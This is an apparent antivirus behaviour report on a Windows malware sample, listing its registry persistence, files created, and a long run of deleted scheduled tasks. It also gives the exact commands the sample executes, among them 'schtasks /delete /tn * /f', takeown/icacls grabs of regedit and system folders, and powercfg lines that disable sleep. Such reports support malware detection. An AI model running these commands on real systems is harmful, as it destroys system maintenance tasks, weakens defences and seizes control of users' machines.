Technical Information
To ensure autorun and distribution
Modifies the following registry keys
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'ctfmon.exe' = '<SYSTEM32>\ctfmon.exe'
Modifies file system
Creates the following files
- <Current directory>\svchost.cmd
- %TEMP%\exef076.tmp
Deletes the following files
- <SYSTEM32>\tasks\adobe acrobat update task
- <SYSTEM32>\tasks\microsoft\windows\shell\windowsparentalcontrols
- <SYSTEM32>\tasks\microsoft\windows\remoteassistance\remoteassistancetask
- <SYSTEM32>\tasks\microsoft\windows\registry\regidlebackup
- <SYSTEM32>\tasks\microsoft\windows\ras\mobilitymanager
- <SYSTEM32>\tasks\microsoft\windows\rac\ractask
- <SYSTEM32>\tasks\microsoft\windows\power efficiency diagnostics\analyzesystem
- <SYSTEM32>\tasks\microsoft\windows\perftrack\backgroundconfigsurveyor
- <SYSTEM32>\tasks\microsoft\windows\shell\windowsparentalcontrolsmigration
- <SYSTEM32>\tasks\microsoft\windows\offline files\logon synchronization
- <SYSTEM32>\tasks\microsoft\windows\nettrace\gathernetworkinfo
- <SYSTEM32>\tasks\microsoft\windows\multimedia\systemsoundsservice
- <SYSTEM32>\tasks\microsoft\windows\mui\lpremove
- <SYSTEM32>\tasks\microsoft\windows\mobilepc\hotstart
- <SYSTEM32>\tasks\microsoft\windows\memorydiagnostic\decompressionfailuredetector
- <SYSTEM32>\tasks\microsoft\windows\memorydiagnostic\corruptiondetector
- <SYSTEM32>\tasks\microsoft\windows\media center\updaterecordpath
- <SYSTEM32>\tasks\microsoft\windows\offline files\background synchronization
- <SYSTEM32>\tasks\microsoft\windows\sideshow\autowake
- <SYSTEM32>\tasks\microsoft\windows\sideshow\gadgetmanager
- <SYSTEM32>\tasks\microsoft\windows\sideshow\sessionagent
- <SYSTEM32>\tasks\microsoft\windows defender\mpidletask
- <SYSTEM32>\tasks\microsoft\windows\windowscolorsystem\calibration loader
- <SYSTEM32>\tasks\microsoft\windows\windowsbackup\confignotification
- <SYSTEM32>\tasks\microsoft\windows\windows media sharing\updatelibrary
- <SYSTEM32>\tasks\microsoft\windows\windows filtering platform\bfeonservicestarttypechange
- <SYSTEM32>\tasks\microsoft\windows\windows error reporting\queuereporting
- <SYSTEM32>\tasks\microsoft\windows\wdi\resolutionhost
- <SYSTEM32>\tasks\microsoft\windows\user profile service\hiveuploadtask
- <SYSTEM32>\tasks\microsoft\windows\upnp\upnphostconfig
- <SYSTEM32>\tasks\microsoft\windows\time synchronization\synchronizetime
- <SYSTEM32>\tasks\microsoft\windows\textservicesframework\msctfmonitor
- <SYSTEM32>\tasks\microsoft\windows\tcpip\ipaddressconflict2
- <SYSTEM32>\tasks\microsoft\windows\tcpip\ipaddressconflict1
- <SYSTEM32>\tasks\microsoft\windows\task manager\interactive
- <SYSTEM32>\tasks\microsoft\windows\systemrestore\sr
- <SYSTEM32>\tasks\microsoft\windows\softwareprotectionplatform\svcrestarttask
- <SYSTEM32>\tasks\microsoft\windows\sideshow\systemdataproviders
- <SYSTEM32>\tasks\microsoft\windows\media center\sqlliterecoverytask
- <SYSTEM32>\tasks\mozilla\firefox default browser agent 308046b0af4a39cb
- <SYSTEM32>\tasks\microsoft\windows\media center\reindexsearchroot
- <SYSTEM32>\tasks\microsoft\windows\media center\recordingrestart
- <SYSTEM32>\tasks\microsoft\windows\defrag\scheduleddefrag
- <SYSTEM32>\tasks\microsoft\windows\customer experience improvement program\usbceip
- <SYSTEM32>\tasks\microsoft\windows\customer experience improvement program\kernelceiptask
- <SYSTEM32>\tasks\microsoft\windows\customer experience improvement program\consolidator
- <SYSTEM32>\tasks\microsoft\windows\certificateservicesclient\usertask-roam
- <SYSTEM32>\tasks\microsoft\windows\certificateservicesclient\usertask
- <SYSTEM32>\tasks\microsoft\windows\certificateservicesclient\systemtask
- <SYSTEM32>\tasks\microsoft\windows\diagnosis\scheduled
- <SYSTEM32>\tasks\microsoft\windows\bluetooth\uninstalldevicetask
- <SYSTEM32>\tasks\microsoft\windows\application experience\programdataupdater
- <SYSTEM32>\tasks\microsoft\windows\application experience\aitagent
- <SYSTEM32>\tasks\microsoft\windows\appid\verifiedpublishercertstorecheck
- <SYSTEM32>\tasks\microsoft\windows\appid\policyconverter
- <SYSTEM32>\tasks\microsoft\windows\active directory rights management services client\ad rms rights policy template management (manual)
- <SYSTEM32>\tasks\microsoft\windows\active directory rights management services client\ad rms rights policy template management (automated)
- <SYSTEM32>\tasks\opera scheduled autoupdate 1664410416
- <SYSTEM32>\tasks\microsoft\windows\autochk\proxy
- <SYSTEM32>\tasks\microsoft\windows\diskdiagnostic\microsoft-windows-diskdiagnosticdatacollector
- <SYSTEM32>\tasks\microsoft\windows\diskdiagnostic\microsoft-windows-diskdiagnosticresolver
- <SYSTEM32>\tasks\microsoft\windows\location\notifications
- <SYSTEM32>\tasks\microsoft\windows\media center\pvrscheduletask
- <SYSTEM32>\tasks\microsoft\windows\media center\pvrrecoverytask
- <SYSTEM32>\tasks\microsoft\windows\media center\periodicscanretry
- <SYSTEM32>\tasks\microsoft\windows\media center\pbdadiscoveryw2
- <SYSTEM32>\tasks\microsoft\windows\media center\pbdadiscoveryw1
- <SYSTEM32>\tasks\microsoft\windows\media center\pbdadiscovery
- <SYSTEM32>\tasks\microsoft\windows\media center\ocurdiscovery
- <SYSTEM32>\tasks\microsoft\windows\media center\ocuractivate
- <SYSTEM32>\tasks\microsoft\windows\media center\objectstorerecoverytask
- <SYSTEM32>\tasks\microsoft\windows\media center\mediacenterrecoverytask
- <SYSTEM32>\tasks\microsoft\windows\media center\mcupdate
- <SYSTEM32>\tasks\microsoft\windows\media center\installplayready
- <SYSTEM32>\tasks\microsoft\windows\media center\ehdrminit
- <SYSTEM32>\tasks\microsoft\windows\media center\dispatchrecoverytasks
- <SYSTEM32>\tasks\microsoft\windows\media center\configureinternettimeservice
- <SYSTEM32>\tasks\microsoft\windows\media center\activatewindowssearch
- <SYSTEM32>\tasks\microsoft\windows\maintenance\winsat
- <SYSTEM32>\tasks\microsoft\windows\media center\registersearch
- <SYSTEM32>\tasks\officesoftwareprotectionplatform\svcrestarttask
Miscellaneous
Creates and executes the following
- '%WINDIR%\syswow64\cmd.exe' /c ""<Current directory>\svchost.cmd""' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\cmd.exe' /c ""<Current directory>\svchost.cmd""
- '%WINDIR%\syswow64\icacls.exe' %WINDIR%\regedit.exe /grant administrators:F /t
- '%WINDIR%\syswow64\takeown.exe' /f %WINDIR%\regedit.exe
- '%WINDIR%\syswow64\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v ctfmon.exe /d "<SYSTEM32>\ctfmon.exe" /f
- '%WINDIR%\syswow64\powercfg.exe' -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 7516b95f-f776-4464-8c53-06167f40cc99 17aaa29b-8b43-4b94-aafe-35f64daaf1ee 0
- '%WINDIR%\syswow64\powercfg.exe' -SetDcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 7516b95f-f776-4464-8c53-06167f40cc99 17aaa29b-8b43-4b94-aafe-35f64daaf1ee 0
- '%WINDIR%\syswow64\powercfg.exe' -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
- '%WINDIR%\syswow64\powercfg.exe' -SetDcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
- '%WINDIR%\syswow64\powercfg.exe' -x -hibernate-timeout-dc 0
- '%WINDIR%\syswow64\powercfg.exe' -x -standby-timeout-dc 0
- '%WINDIR%\syswow64\powercfg.exe' -x -disk-timeout-dc 0
- '%WINDIR%\syswow64\powercfg.exe' -x -monitor-timeout-dc 0
- '%WINDIR%\syswow64\powercfg.exe' -x -hibernate-timeout-ac 0
- '%WINDIR%\syswow64\powercfg.exe' -x -standby-timeout-ac 0
- '%WINDIR%\syswow64\powercfg.exe' -x -disk-timeout-ac 0
- '%WINDIR%\syswow64\powercfg.exe' -x -monitor-timeout-ac 0
- '%WINDIR%\syswow64\powercfg.exe' -s 381b4222-f694-41f0-9685-ff5bb260df2e
- '%WINDIR%\syswow64\powercfg.exe' -h off
- '%WINDIR%\syswow64\schtasks.exe' /delete /tn * /f
- '%WINDIR%\syswow64\takeown.exe' /f %WINDIR%\system64 /r /d y
- '%WINDIR%\syswow64\takeown.exe' /f %WINDIR%\system64\pagefile.reg
- '%WINDIR%\syswow64\takeown.exe' /f %WINDIR%\system64\setacl.bat
